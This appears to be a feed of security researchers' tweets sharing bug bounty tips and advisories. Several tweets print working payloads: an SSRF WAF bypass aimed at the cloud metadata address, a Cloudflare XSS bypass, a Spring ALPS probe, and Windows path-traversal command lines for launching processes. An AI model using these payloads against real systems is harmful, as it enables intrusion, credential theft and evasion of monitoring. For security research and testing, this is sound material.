Successfully bypassed an SSRF WAF by using a combination of IPv6 + Unicode. Payload for Metadata instances: http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 Check images for response difference between 169.254.169.254 and the above payload I shared 🔥 #bugbounty #infosec #waf
I found a SQL on one URL but properly secured. But found @LiveOverflow new video "HTML Sanitizer Bypass Investigation". I gave it a try and I was able to bypass Cloudflare which leads to XSS. Payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
Doing #BugBounty again :) Quick write-up about a Critical vuln I found: Exploiting Application-Level Profile Semantics (ALPS) from Spring 🧙‍♂️ curl -H 'Accept:application/schema+json' -v http://localhost:8080/alps/profile/users niemand.com.ar/2021/01/08/exp… #BugBountyTips #infosec
New article about how to persist “laterally” reading DPAPI keys. This could be used in a red team project. /cc @CoreSecurity
We know how the Internet feels about #cats: More is better. We're doing our part by showing you how to read #DPAPI keys using #mimikatz: coresecurity.com/core-labs/arti…
Thank you, Tandil community! Warm regards, and it was a pleasure to have been able to take part.
🔥 We published a new video on our YouTube channel! 🍻 Diego and @riflon from @CoreSecurity shared with us the methodology they use when pentesting and some stories from real cases. Thank you very much! 📺 youtu.be/A3Ut_ehMZfA
New Advisory of the SCS Team at #coresecurity coresecurity.com/core-labs/advi… An authenticated OS Command Execution abusing websockets @aritombino
Multiple vulnerabilities in Pandora FMS - New advisory published --> coresecurity.com/core-labs/advi… #CoreSecurity @CoreSecurity
Found an even cooler example with this technique when looking at it quick. When executing with conhost it executes the process without a parent PID. conhost calc.exe/../../windows/notepad.exe Thanks for the inspiring post @julianpentest
This also works really well: cmd.exe /c "gpupdate /force/../../../../../../../../../../windows/notepad.exe" and cmd /c "mshta.exe c:\temp\none.hta/../../../../../../../../../../windows/notepad.exe" Fun stuff to be had with this technique
New XSS stored in Zulip by @aritombino - Advisory here --> coresecurity.com/advisories/zul… #CoreSecurity
I just published Exploiting WebSocket [Application Wide XSS / CSRF] link.medium.com/puqyeTGD93 #bugbountytips #security @Bugcrowd
Payloads collection:- Command Injection:- github.com/payloadbox/com… XSS Payloads:- github.com/payloadbox/xss… XXE Payload List:- github.com/payloadbox/xxe… SQLI Payload List:- github.com/payloadbox/sql… RFI/LFI :- github.com/payloadbox/rfi… Open Redirect:- github.com/payloadbox/ope…
How to build a TCP proxy (Part 1) : Intro : robertheaton.com/2018/08/31/how… Fake DNS Server (Part 2) : robertheaton.com/2018/08/31/how… Proxy Server (Part 3) : robertheaton.com/2018/08/31/how… Fake Certificate Authority (Part 4) : robertheaton.com/2018/08/31/how… cc @RobJHeaton
LM, NTLM, Net-NTLMv2, oh my! A Pentester's Guide to #Windows Hashes medium.com/@petergombos/l…
HTTP Request Smuggling in Apache Traffic Server : regilero.github.io/english/securi… HTTP Smuggling, Jetty : regilero.github.io/english/securi… cc @regilero